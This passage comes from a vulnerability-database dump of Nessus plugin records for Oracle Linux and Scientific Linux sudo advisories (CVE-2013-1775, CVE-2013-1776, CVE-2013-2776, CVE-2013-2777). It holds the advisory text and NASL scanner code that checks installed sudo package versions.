(report_verbosity > 0) security_warning(port:0, extra:error_extra);\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_PACKAGE_NOT_AFFECTED, \"sudo\");\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-25T08:55:50", "description": "From Red Hat Security Advisory 2013:1701 :\n\nAn updated sudo package that fixes two security issues, several bugs,\nand adds two enhancements is now available for Red Hat Enterprise\nLinux 6.\n\nThe Red Hat Security Response Team has rated this update as having low\nsecurity impact. 
Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nThe sudo (superuser do) utility allows system administrators to give\ncertain users the ability to run commands as root.\n\nA flaw was found in the way sudo handled time stamp files. An attacker\nable to run code as a local user and with the ability to control the\nsystem clock could possibly gain additional privileges by running\ncommands that the victim user was allowed to run via sudo, without\nknowing the victim's password. (CVE-2013-1775)\n\nIt was found that sudo did not properly validate the controlling\nterminal device when the tty_tickets option was enabled in the\n/etc/sudoers file. An attacker able to run code as a local user could\npossibly gain additional privileges by running commands that the\nvictim user was allowed to run via sudo, without knowing the victim's\npassword. (CVE-2013-2776, CVE-2013-2777)\n\nThis update also fixes the following bugs :\n\n* Previously, sudo did not support netgroup filtering for sources from\nthe System Security Services Daemon (SSSD). Consequently, SSSD rules\nwere applied to all users even when they did not belong to the\nspecified netgroup. With this update, netgroup filtering for SSSD\nsources has been implemented. As a result, rules with a netgroup\nspecification are applied only to users that are part of the netgroup.\n(BZ#880150)\n\n* When the sudo utility set up the environment in which it ran a\ncommand, it reset the value of the RLIMIT_NPROC resource limit to the\nparent's value of this limit if both the soft (current) and hard\n(maximum) values of RLIMIT_NPROC were not limited. An upstream patch\nhas been provided to address this bug and RLIMIT_NPROC can now be set\nto 'unlimited'. 
(BZ#947276)\n\n* Due to the refactoring of the sudo code by upstream, the SUDO_USER\nvariable that stores the name of the user running the sudo command was\nnot logged to the /var/log/secure file as before. Consequently, user\nname 'root' was always recorded instead of the real user name. With\nthis update, the previous behavior of sudo has been restored. As a\nresult, the expected user name is now written to /var/log/secure.\n(BZ#973228)\n\n* Due to an error in a loop condition in sudo's rule listing code, a\nbuffer overflow could have occurred in certain cases. This condition\nhas been fixed and the buffer overflow no longer occurs. (BZ#994626)\n\nIn addition, this update adds the following enhancements :\n\n* With this update, sudo has been modified to send debug messages\nabout netgroup matching to the debug log. These messages should\nprovide better understanding of how sudo matches netgroup database\nrecords with values from the running system and what the values are\nexactly. (BZ#848111)\n\n* With this update, sudo has been modified to accept the ipa_hostname\nvalue from the /etc/sssd/sssd.conf configuration file when matching\nnetgroups. 
(BZ#853542)\n\nAll sudo users are advised to upgrade to this updated package, which\ncontains backported patches to correct these issues and add these\nenhancements.", "edition": 21, "published": "2013-11-27T00:00:00", "title": "Oracle Linux 6 : sudo (ELSA-2013-1701)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1775", "CVE-2013-2777", "CVE-2013-2776"], "modified": "2013-11-27T00:00:00", "cpe": ["cpe:/o:oracle:linux:6", "p-cpe:/a:oracle:linux:sudo", "p-cpe:/a:oracle:linux:sudo-devel"], "id": "ORACLELINUX_ELSA-2013-1701.NASL", "href": "https://www.tenable.com/plugins/nessus/71112", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2013:1701 and \n# Oracle Linux Security Advisory ELSA-2013-1701 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(71112);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/24\");\n\n script_cve_id(\"CVE-2013-1775\", \"CVE-2013-2776\", \"CVE-2013-2777\");\n script_bugtraq_id(58203, 58207, 62741);\n script_xref(name:\"RHSA\", value:\"2013:1701\");\n\n script_name(english:\"Oracle Linux 6 : sudo (ELSA-2013-1701)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2013:1701 :\n\nAn updated sudo package that fixes two security issues, several bugs,\nand adds two enhancements is now available for Red Hat Enterprise\nLinux 6.\n\nThe Red Hat Security Response Team has rated this update as having low\nsecurity impact. 
Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nThe sudo (superuser do) utility allows system administrators to give\ncertain users the ability to run commands as root.\n\nA flaw was found in the way sudo handled time stamp files. An attacker\nable to run code as a local user and with the ability to control the\nsystem clock could possibly gain additional privileges by running\ncommands that the victim user was allowed to run via sudo, without\nknowing the victim's password. (CVE-2013-1775)\n\nIt was found that sudo did not properly validate the controlling\nterminal device when the tty_tickets option was enabled in the\n/etc/sudoers file. An attacker able to run code as a local user could\npossibly gain additional privileges by running commands that the\nvictim user was allowed to run via sudo, without knowing the victim's\npassword. (CVE-2013-2776, CVE-2013-2777)\n\nThis update also fixes the following bugs :\n\n* Previously, sudo did not support netgroup filtering for sources from\nthe System Security Services Daemon (SSSD). Consequently, SSSD rules\nwere applied to all users even when they did not belong to the\nspecified netgroup. With this update, netgroup filtering for SSSD\nsources has been implemented. As a result, rules with a netgroup\nspecification are applied only to users that are part of the netgroup.\n(BZ#880150)\n\n* When the sudo utility set up the environment in which it ran a\ncommand, it reset the value of the RLIMIT_NPROC resource limit to the\nparent's value of this limit if both the soft (current) and hard\n(maximum) values of RLIMIT_NPROC were not limited. An upstream patch\nhas been provided to address this bug and RLIMIT_NPROC can now be set\nto 'unlimited'. 
(BZ#947276)\n\n* Due to the refactoring of the sudo code by upstream, the SUDO_USER\nvariable that stores the name of the user running the sudo command was\nnot logged to the /var/log/secure file as before. Consequently, user\nname 'root' was always recorded instead of the real user name. With\nthis update, the previous behavior of sudo has been restored. As a\nresult, the expected user name is now written to /var/log/secure.\n(BZ#973228)\n\n* Due to an error in a loop condition in sudo's rule listing code, a\nbuffer overflow could have occurred in certain cases. This condition\nhas been fixed and the buffer overflow no longer occurs. (BZ#994626)\n\nIn addition, this update adds the following enhancements :\n\n* With this update, sudo has been modified to send debug messages\nabout netgroup matching to the debug log. These messages should\nprovide better understanding of how sudo matches netgroup database\nrecords with values from the running system and what the values are\nexactly. (BZ#848111)\n\n* With this update, sudo has been modified to accept the ipa_hostname\nvalue from the /etc/sssd/sssd.conf configuration file when matching\nnetgroups. 
(BZ#853542)\n\nAll sudo users are advised to upgrade to this updated package, which\ncontains backported patches to correct these issues and add these\nenhancements.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2013-November/003813.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected sudo packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Mac OS X Sudo Password Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:sudo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:sudo-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/03/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/11/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/11/27\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", reference:\"sudo-1.8.6p3-12.el6\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"sudo-devel-1.8.6p3-12.el6\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"sudo / sudo-devel\");\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-25T08:55:48", "description": "From Red Hat Security Advisory 2013:1353 :\n\nAn 
updated sudo package that fixes multiple security issues and\nseveral bugs is now available for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having low\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nThe sudo (superuser do) utility allows system administrators to give\ncertain users the ability to run commands as root.\n\nA flaw was found in the way sudo handled time stamp files. An attacker\nable to run code as a local user and with the ability to control the\nsystem clock could possibly gain additional privileges by running\ncommands that the victim user was allowed to run via sudo, without\nknowing the victim's password. (CVE-2013-1775)\n\nIt was found that sudo did not properly validate the controlling\nterminal device when the tty_tickets option was enabled in the\n/etc/sudoers file. An attacker able to run code as a local user could\npossibly gain additional privileges by running commands that the\nvictim user was allowed to run via sudo, without knowing the victim's\npassword. (CVE-2013-1776, CVE-2013-2776)\n\nThis update also fixes the following bugs :\n\n* Due to a bug in the cycle detection algorithm of the visudo utility,\nvisudo incorrectly evaluated certain alias definitions in the\n/etc/sudoers file as cycles. Consequently, a warning message about\nundefined aliases appeared. This bug has been fixed, /etc/sudoers is\nnow parsed correctly by visudo and the warning message no longer\nappears. (BZ#849679)\n\n* Previously, the 'sudo -l' command did not parse the /etc/sudoers\nfile correctly if it contained an Active Directory (AD) group. 
The\nfile was parsed only up to the first AD group information and then the\nparsing failed with the following message :\n\nsudo: unable to cache group ADDOM\\admingroup, already exists\n\nWith this update, the underlying code has been modified and 'sudo -l'\nnow parses /etc/sudoers containing AD groups correctly. (BZ#855836)\n\n* Previously, the sudo utility did not escape the backslash characters\ncontained in user names properly. Consequently, if a system used sudo\nintegrated with LDAP or Active Directory (AD) as the primary\nauthentication mechanism, users were not able to authenticate on that\nsystem. With this update, sudo has been modified to process LDAP and\nAD names correctly and the authentication process now works as\nexpected. (BZ#869287)\n\n* Prior to this update, the 'visudo -s (strict)' command incorrectly\nparsed certain alias definitions. Consequently, an error message was\nissued. The bug has been fixed, and parsing errors no longer occur\nwhen using 'visudo -s'. 
(BZ#905624)\n\nAll sudo users are advised to upgrade to this updated package, which\ncontains backported patches to correct these issues.", "edition": 17, "published": "2013-10-03T00:00:00", "title": "Oracle Linux 5 : sudo (ELSA-2013-1353)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1775", "CVE-2013-1776", "CVE-2013-2776"], "modified": "2013-10-03T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:sudo", "cpe:/o:oracle:linux:5"], "id": "ORACLELINUX_ELSA-2013-1353.NASL", "href": "https://www.tenable.com/plugins/nessus/70288", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2013:1353 and \n# Oracle Linux Security Advisory ELSA-2013-1353 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(70288);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/24\");\n\n script_cve_id(\"CVE-2013-1775\", \"CVE-2013-1776\", \"CVE-2013-2776\");\n script_bugtraq_id(58203, 58207);\n script_xref(name:\"RHSA\", value:\"2013:1353\");\n\n script_name(english:\"Oracle Linux 5 : sudo (ELSA-2013-1353)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2013:1353 :\n\nAn updated sudo package that fixes multiple security issues and\nseveral bugs is now available for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having low\nsecurity impact. 
Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nThe sudo (superuser do) utility allows system administrators to give\ncertain users the ability to run commands as root.\n\nA flaw was found in the way sudo handled time stamp files. An attacker\nable to run code as a local user and with the ability to control the\nsystem clock could possibly gain additional privileges by running\ncommands that the victim user was allowed to run via sudo, without\nknowing the victim's password. (CVE-2013-1775)\n\nIt was found that sudo did not properly validate the controlling\nterminal device when the tty_tickets option was enabled in the\n/etc/sudoers file. An attacker able to run code as a local user could\npossibly gain additional privileges by running commands that the\nvictim user was allowed to run via sudo, without knowing the victim's\npassword. (CVE-2013-1776, CVE-2013-2776)\n\nThis update also fixes the following bugs :\n\n* Due to a bug in the cycle detection algorithm of the visudo utility,\nvisudo incorrectly evaluated certain alias definitions in the\n/etc/sudoers file as cycles. Consequently, a warning message about\nundefined aliases appeared. This bug has been fixed, /etc/sudoers is\nnow parsed correctly by visudo and the warning message no longer\nappears. (BZ#849679)\n\n* Previously, the 'sudo -l' command did not parse the /etc/sudoers\nfile correctly if it contained an Active Directory (AD) group. The\nfile was parsed only up to the first AD group information and then the\nparsing failed with the following message :\n\nsudo: unable to cache group ADDOM\\admingroup, already exists\n\nWith this update, the underlying code has been modified and 'sudo -l'\nnow parses /etc/sudoers containing AD groups correctly. (BZ#855836)\n\n* Previously, the sudo utility did not escape the backslash characters\ncontained in user names properly. 
Consequently, if a system used sudo\nintegrated with LDAP or Active Directory (AD) as the primary\nauthentication mechanism, users were not able to authenticate on that\nsystem. With this update, sudo has been modified to process LDAP and\nAD names correctly and the authentication process now works as\nexpected. (BZ#869287)\n\n* Prior to this update, the 'visudo -s (strict)' command incorrectly\nparsed certain alias definitions. Consequently, an error message was\nissued. The bug has been fixed, and parsing errors no longer occur\nwhen using 'visudo\n\n* s'. (BZ#905624)\n\nAll sudo users are advised to upgrade to this updated package, which\ncontains backported patches to correct these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2013-October/003701.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected sudo package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Mac OS X Sudo Password Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:sudo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/03/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/10/02\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/10/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL5\", reference:\"sudo-1.7.2p1-28.el5\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"sudo\");\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-14T18:22:46", "description": "A flaw was found in the way sudo handled time stamp files. An attacker\nable to run code as a local user and with the ability to control the\nsystem clock could possibly gain additional privileges by running\ncommands that the victim user was allowed to run via sudo, without\nknowing the victim's password. (CVE-2013-1775)\n\nIt was found that sudo did not properly validate the controlling\nterminal device when the tty_tickets option was enabled in the\n/etc/sudoers file. An attacker able to run code as a local user could\npossibly gain additional privileges by running commands that the\nvictim user was allowed to run via sudo, without knowing the victim's\npassword. (CVE-2013-1776, CVE-2013-2776)\n\nThis update also fixes the following bugs :\n\n - Due to a bug in the cycle detection algorithm of the\n visudo utility, visudo incorrectly evaluated certain\n alias definitions in the /etc/sudoers file as cycles.\n Consequently, a warning message about undefined aliases\n appeared. 
This bug has been fixed, /etc/sudoers is now\n parsed correctly by visudo and the warning message no\n longer appears.\n\n - Previously, the 'sudo -l' command did not parse the\n /etc/sudoers file correctly if it contained an Active\n Directory (AD) group. The file was parsed only up to the\n first AD group information and then the parsing failed\n with the following message :\n\nsudo: unable to cache group ADDOM\\admingroup, already exists\n\nWith this update, the underlying code has been modified and 'sudo -l'\nnow parses /etc/sudoers containing AD groups correctly.\n\n - Previously, the sudo utility did not escape the\n backslash characters contained in user names properly.\n Consequently, if a system used sudo integrated with LDAP\n or Active Directory (AD) as the primary authentication\n mechanism, users were not able to authenticate on that\n system. With this update, sudo has been modified to\n process LDAP and AD names correctly and the\n authentication process now works as expected.\n\n - Prior to this update, the 'visudo -s (strict)' command\n incorrectly parsed certain alias definitions.\n Consequently, an error message was issued. 
The bug has\n been fixed, and parsing errors no longer occur when\n using 'visudo -s'.", "edition": 14, "published": "2013-10-11T00:00:00", "title": "Scientific Linux Security Update : sudo on SL5.x i386/x86_64 (20130930)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1775", "CVE-2013-1776", "CVE-2013-2776"], "modified": "2013-10-11T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:sudo-debuginfo", "x-cpe:/o:fermilab:scientific_linux", "p-cpe:/a:fermilab:scientific_linux:sudo"], "id": "SL_20130930_SUDO_ON_SL5_X.NASL", "href": "https://www.tenable.com/plugins/nessus/70392", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(70392);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/03/12\");\n\n script_cve_id(\"CVE-2013-1775\", \"CVE-2013-1776\", \"CVE-2013-2776\");\n\n script_name(english:\"Scientific Linux Security Update : sudo on SL5.x i386/x86_64 (20130930)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A flaw was found in the way sudo handled time stamp files. An attacker\nable to run code as a local user and with the ability to control the\nsystem clock could possibly gain additional privileges by running\ncommands that the victim user was allowed to run via sudo, without\nknowing the victim's password. (CVE-2013-1775)\n\nIt was found that sudo did not properly validate the controlling\nterminal device when the tty_tickets option was enabled in the\n/etc/sudoers file. 
An attacker able to run code as a local user could\npossibly gain additional privileges by running commands that the\nvictim user was allowed to run via sudo, without knowing the victim's\npassword. (CVE-2013-1776, CVE-2013-2776)\n\nThis update also fixes the following bugs :\n\n - Due to a bug in the cycle detection algorithm of the\n visudo utility, visudo incorrectly evaluated certain\n alias definitions in the /etc/sudoers file as cycles.\n Consequently, a warning message about undefined aliases\n appeared. This bug has been fixed, /etc/sudoers is now\n parsed correctly by visudo and the warning message no\n longer appears.\n\n - Previously, the 'sudo -l' command did not parse the\n /etc/sudoers file correctly if it contained an Active\n Directory (AD) group. The file was parsed only up to the\n first AD group information and then the parsing failed\n with the following message :\n\nsudo: unable to cache group ADDOM\\admingroup, already exists\n\nWith this update, the underlying code has been modified and 'sudo -l'\nnow parses /etc/sudoers containing AD groups correctly.\n\n - Previously, the sudo utility did not escape the\n backslash characters contained in user names properly.\n Consequently, if a system used sudo integrated with LDAP\n or Active Directory (AD) as the primary authentication\n mechanism, users were not able to authenticate on that\n system. With this update, sudo has been modified to\n process LDAP and AD names correctly and the\n authentication process now works as expected.\n\n - Prior to this update, the 'visudo -s (strict)' command\n incorrectly parsed certain alias definitions.\n Consequently, an error message was issued. 
The bug has\n been fixed, and parsing errors no longer occur when\n using 'visudo - -s'.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1310&L=scientific-linux-errata&T=0&P=934\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b130a933\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected sudo and / or sudo-debuginfo packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Mac OS X Sudo Password Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:sudo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:sudo-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/03/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/09/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/10/11\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 5.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL5\", reference:\"sudo-1.7.2p1-28.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"sudo-debuginfo-1.7.2p1-28.el5\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"sudo / sudo-debuginfo\");\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-25T09:14:50", "description": "An updated sudo package that fixes multiple security issues and\nseveral bugs is now available for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security 
Response Team has rated this update as having low\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nThe sudo (superuser do) utility allows system administrators to give\ncertain users the ability to run commands as root.\n\nA flaw was found in the way sudo handled time stamp files. An attacker\nable to run code as a local user and with the ability to control the\nsystem clock could possibly gain additional privileges by running\ncommands that the victim user was allowed to run via sudo, without\nknowing the victim's password. (CVE-2013-1775)\n\nIt was found that sudo did not properly validate the controlling\nterminal device when the tty_tickets option was enabled in the\n/etc/sudoers file. An attacker able to run code as a local user could\npossibly gain additional privileges by running commands that the\nvictim user was allowed to run via sudo, without knowing the victim's\npassword. (CVE-2013-1776, CVE-2013-2776)\n\nThis update also fixes the following bugs :\n\n* Due to a bug in the cycle detection algorithm of the visudo utility,\nvisudo incorrectly evaluated certain alias definitions in the\n/etc/sudoers file as cycles. Consequently, a warning message about\nundefined aliases appeared. This bug has been fixed, /etc/sudoers is\nnow parsed correctly by visudo and the warning message no longer\nappears. 